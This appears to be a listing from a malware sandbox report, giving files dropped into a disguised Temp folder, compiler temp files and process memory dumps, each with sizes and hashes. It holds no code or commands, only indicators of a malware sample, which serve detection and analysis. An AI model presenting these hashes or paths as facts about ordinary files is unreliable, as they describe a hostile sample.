8df7060c970016a4f2d267f41e8010b42036642b55fb1ad766d64b935b7afbb6

SHA512
eab865a69bfc3a4ac1108f14983f328a60ba5db41429c62871e2327fde914d8842c1c5aab69b9c54424d64c28271bf4758685d806a874ef66cfd08de8f8b8543

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Desktop\BackupRepair.sys

Filesize
680KB

MD5
ee382cabf502725626522776f65208a1

SHA1
1d485f7257255ef93cdc57c1ad651bee729d0923

SHA256
c61b9dcfed8b4f81b1e32b9287f2a2344f7585ef3e7629c442b9c4f184e406da

SHA512
55cbba72bb6d88e7f2ae40e59b0b145b04b700915736209b6a1c028662f203a66f85ea1c6f19b10b2c89a3a1858a9994f7b9dc6761c55afeaccd5e10acef299a

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Desktop\ConvertExpand.xls

Filesize
919KB

MD5
2e234f454841e1c152ca8a2a94fa7490

SHA1
56ca1f11d0fb4d2ec6412f9f5616ca574bc468d1

SHA256
602a9552bd46bcb4d63296f21ddd2730e9cacd0f95f4510edef7241898b448e4

SHA512
15dfd3c59112c77dbac2874dff21d5f98819bc9a05da57f8303bf632ee11453c2722182a58e8e0056045782be89144e30eef71c1dba377983cdf2d922ed1630d

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Desktop\ExitRepair.xlsx

Filesize
16KB

MD5
0f01ad96adc5769849e5982a2bb723ea

SHA1
c6e9b2a56905432ad9e432e9203059b362b08fef

SHA256
f33c8b98e4f5782e98fb6a28371bc44b17d628d5dc07fc53db50c6e987ba46eb

SHA512
8e07a8f2f5394c7c46b7e9924b978045f61c8315d9941831639ccd7bb0da9c75f061065e80655548d9eefb5477b468083e510059be559eb1455cb98885846d2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Desktop\SearchReceive.docx

Filesize
18KB

MD5
ddaa99519defa67c405d7100f83e1132

SHA1
afe93b2618ecf545fae243c2adb4ef0f48f5b3e7

SHA256
fe12127bce5c05a3d7dfc3412e90c4834ad35f072bddb2f16f9fcd36c42d24e0

SHA512
022a404dd4dfd79c9fc7d8822f6d7aaedf962e5e496f4de2b760f4c26ef369e227e9f6222b9fcb462d84a59791ab8823e4a61d6c0949cd82eae72b4e9686d221

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Documents\DismountNew.pdf

Filesize
1004KB

MD5
d09c1595bb90fa07fd351163b558b060

SHA1
cbc6807c725b4d7a17996c71a14088d2735e4a1f

SHA256
c18998be97640855ae7df493d3da668e327e7f1ee58436fb8a2c908d7316a2a7

SHA512
984dc0bc5a5de37e334dd2ef3690698344fd54a54590619f8f1c1939058545f581b2f77841668404fb8a3ad745a6620f62de081be9776f5b7597af89d6139fac

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Documents\ExitUnpublish.xls

Filesize
1.4MB

MD5
b4568a5c8a2490d4a33e9c38193a6a6f

SHA1
62694c25f9c0f57051cd8e4840a353f62eeb3ea1

SHA256
251e5c87f99c4be7f190226df7ef4be2a737cbb0247e2c4d5fbf0336bbcf57c3

SHA512
f239b1f2448911a70dfe6be8beedb62cf01ffd4a491a62f90a3e7002ac72df224f19cd415632bf55f1325fb3ad5a318d94b5518a8e8ef2a78d7bcd3494fb3249

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Documents\LockDebug.xls

Filesize
1.2MB

MD5
22b1d021d272a5a89453972932781a4a

SHA1
174aafd2fac9adf81f45e71e83f66c54242a21d7

SHA256
32ea4877e52cd891bd6a08051b29902af37bbee0741b9f7269eac8deb65ff081

SHA512
eb6819280bbb826ffb4baf79268f0a8f196e6d6fab3120d8b93ba9550fda541d128b3ae1c34b56d467d6489ab170e0b9d770fa8344d4b6f405ab4da0fcd502fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Documents\OptimizeRepair.xlsx

Filesize
9KB

MD5
d535b5359a223f4be772d5d4a30eb032

SHA1
3e5776537894fc219d024ef8cf943d1d2e16cf95

SHA256
97325592861b6df23f3c712c3620dfaa9c73864871693513b98cbfb603dd9192

SHA512
34e87498cd78831aa4a2c2dd1799fde36ee5d9c5769f2ce1b72e6cc687bd73b39b4075b223a5da7c06617b16d17672b363ec46caa301589eb9001eed7d7225ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Documents\RequestEnter.xlsx

Filesize
13KB

MD5
e889f01dd241c05903f3f1fe97aa10ee

SHA1
94a53dc6a232db878690511e5ac04951bc9b2f2a

SHA256
c07b5a51b66b6bba22fd60ff492d2a96584a9649d32df01b5a99cf0feba95510

SHA512
194552c4ed69ffa70c49c54d88e35cc258d6698913639ca156388c3d3b6be534efb7c1a5962fe90b412829d348bd7c768405dabcb6f1f1ed9f470e4200bf594b

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Documents\RevokeRename.csv

Filesize
1.7MB

MD5
6aa437be24d8f7feb2a7cb30598b3622

SHA1
68503a4af780e5bae427c36f517a10f14df56cb0

SHA256
0ae37e7ffe36186841e43c17ca8a17002f50bcb31231577faedf4297afaa3919

SHA512
f10980b5b6986f88cd331f4430b40ad51b84f4a7aa02c74c5b28719539c6960391eee35f154e7b7765571e9eafa81e7b0a707dc0e4153c81e04c17ef49a607d1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uspikeuy\CSC7620553EB08048E29976E34E3C4C42CF.TMP

Filesize
652B

MD5
d5132750670421079c9f28d440fc6930

SHA1
cd7d50524f73d262468207b82abdf3311e8a498a

SHA256
dc0354d0bf86de2311c93fed600721ed33166ca483fb903e55cacd5efd2028f6

SHA512
ca726bbd04e39ac6be0e96dfddd1177c06d470d71dbb76c95da2e1bd1b2bc182eb720e894d174f80216aa30c30c6faefa17bec28579bc30c6f6701711cdd864d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uspikeuy\uspikeuy.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uspikeuy\uspikeuy.cmdline

Filesize
607B

MD5
02aa9a68b51ef86348bc3a6e164caa96

SHA1
9f678bbaf46c7fd460d7877f412cd2c4a7ae04e1

SHA256
e5be646c81ca585218435e768ebd6554780c5a78d1740cc4ed3c32d59ff3c98a

SHA512
011503a8eb5a7a8e2e44b41c20b05390e061661dbbe3153486ce0bdd9b8a5efe18d8d0e6099e1471dbb664bfc178ab8622471b0950744738532636aa6dbf9528

Download Submit
memory/736-213-0x00007FFCFD400000-0x00007FFCFD571000-memory.dmp

Filesize
1.4MB

Download
memory/736-56-0x00007FFD0CC70000-0x00007FFD0CC9C000-memory.dmp

Filesize
176KB

Download
memory/736-345-0x00007FFCFCCE0000-0x00007FFCFCDF8000-memory.dmp

Filesize
1.1MB

Download
memory/736-83-0x00007FFD0CC70000-0x00007FFD0CC9C000-memory.dmp

Filesize
176KB

Download
memory/736-50-0x00007FFD10520000-0x00007FFD1052F000-memory.dmp

Filesize
60KB

Download
memory/736-84-0x00007FFCFCCE0000-0x00007FFCFCDF8000-memory.dmp

Filesize
1.1MB

Download
memory/736-77-0x00007FFD0CD70000-0x00007FFD0CD94000-memory.dmp

Filesize
144KB

Download
memory/736-80-0x00007FFD0CE50000-0x00007FFD0CE5D000-memory.dmp

Filesize
52KB

Download
memory/736-346-0x00007FFD0E6D0000-0x00007FFD0E6DD000-memory.dmp

Filesize
52KB

Download
memory/736-78-0x00007FFD0CAD0000-0x00007FFD0CAE5000-memory.dmp

Filesize
84KB

Download
memory/736-31-0x00007FFD0CD70000-0x00007FFD0CD94000-memory.dmp

Filesize
144KB

Download
memory/736-71-0x00007FFCFCEB0000-0x00007FFCFD315000-memory.dmp

Filesize
4.4MB

Download
memory/736-26-0x00007FFCFCEB0000-0x00007FFCFD315000-memory.dmp

Filesize
4.4MB

Download
memory/736-275-0x00007FFD0CC30000-0x00007FFD0CC49000-memory.dmp

Filesize
100KB

Download
memory/736-73-0x00007FFCFC610000-0x00007FFCFC987000-memory.dmp

Filesize
3.5MB

Download
memory/736-74-0x00000290BB590000-0x00000290BB907000-memory.dmp

Filesize
3.5MB

Download
memory/736-75-0x00007FFCFD340000-0x00007FFCFD3F7000-memory.dmp

Filesize
732KB

Download
memory/736-72-0x00007FFD0CC00000-0x00007FFD0CC2E000-memory.dmp

Filesize
184KB

Download
memory/736-65-0x00007FFD0CC30000-0x00007FFD0CC49000-memory.dmp

Filesize
100KB

Download
memory/736-66-0x00007FFD0E6D0000-0x00007FFD0E6DD000-memory.dmp

Filesize
52KB

Download
memory/736-62-0x00007FFCFD400000-0x00007FFCFD571000-memory.dmp

Filesize
1.4MB

Download
memory/736-60-0x00007FFD0CC50000-0x00007FFD0CC6E000-memory.dmp

Filesize
120KB

Download
memory/736-58-0x00007FFD11EA0000-0x00007FFD11EB8000-memory.dmp

Filesize
96KB

Download
memory/736-186-0x00007FFD0CC50000-0x00007FFD0CC6E000-memory.dmp

Filesize
120KB

Download
memory/736-291-0x00007FFD0CC00000-0x00007FFD0CC2E000-memory.dmp

Filesize
184KB

Download
memory/736-292-0x00007FFCFC610000-0x00007FFCFC987000-memory.dmp

Filesize
3.5MB

Download
memory/736-293-0x00000290BB590000-0x00000290BB907000-memory.dmp

Filesize
3.5MB

Download
memory/736-304-0x00007FFCFD340000-0x00007FFCFD3F7000-memory.dmp

Filesize
732KB

Download
memory/736-347-0x00007FFD0CD70000-0x00007FFD0CD94000-memory.dmp

Filesize
144KB

Download
memory/736-321-0x00007FFD0CC50000-0x00007FFD0CC6E000-memory.dmp

Filesize
120KB

Download
memory/736-317-0x00007FFD0CD70000-0x00007FFD0CD94000-memory.dmp

Filesize
144KB

Download
memory/736-322-0x00007FFCFD400000-0x00007FFCFD571000-memory.dmp

Filesize
1.4MB

Download
memory/736-316-0x00007FFCFCEB0000-0x00007FFCFD315000-memory.dmp

Filesize
4.4MB

Download
memory/736-331-0x00007FFCFCEB0000-0x00007FFCFD315000-memory.dmp

Filesize
4.4MB

Download
memory/736-358-0x00007FFD0CE50000-0x00007FFD0CE5D000-memory.dmp

Filesize
52KB

Download
memory/736-357-0x00007FFD0CAD0000-0x00007FFD0CAE5000-memory.dmp

Filesize
84KB

Download
memory/736-356-0x00007FFCFC610000-0x00007FFCFC987000-memory.dmp

Filesize
3.5MB

Download
memory/736-355-0x00007FFD0CC00000-0x00007FFD0CC2E000-memory.dmp

Filesize
184KB

Download
memory/736-354-0x00007FFCFD340000-0x00007FFCFD3F7000-memory.dmp

Filesize
732KB

Download
memory/736-353-0x00007FFD0CC30000-0x00007FFD0CC49000-memory.dmp

Filesize
100KB

Download
memory/736-352-0x00007FFCFD400000-0x00007FFCFD571000-memory.dmp

Filesize
1.4MB

Download
memory/736-351-0x00007FFD0CC50000-0x00007FFD0CC6E000-memory.dmp

Filesize
120KB

Download
memory/736-350-0x00007FFD11EA0000-0x00007FFD11EB8000-memory.dmp

Filesize
96KB

Download
memory/736-349-0x00007FFD0CC70000-0x00007FFD0CC9C000-memory.dmp

Filesize
176KB

Download
memory/736-348-0x00007FFD10520000-0x00007FFD1052F000-memory.dmp

Filesize
60KB

Download
memory/976-315-0x000001D06C720000-0x000001D06C768000-memory.dmp

Filesize
288KB

Download
memory/1460-206-0x000002637D0D0000-0x000002637D0D8000-memory.dmp

Filesize
32KB

Download
memory/3332-94-0x000002AB996F0000-0x000002AB99712000-memory.dmp

Filesize
136KB

Download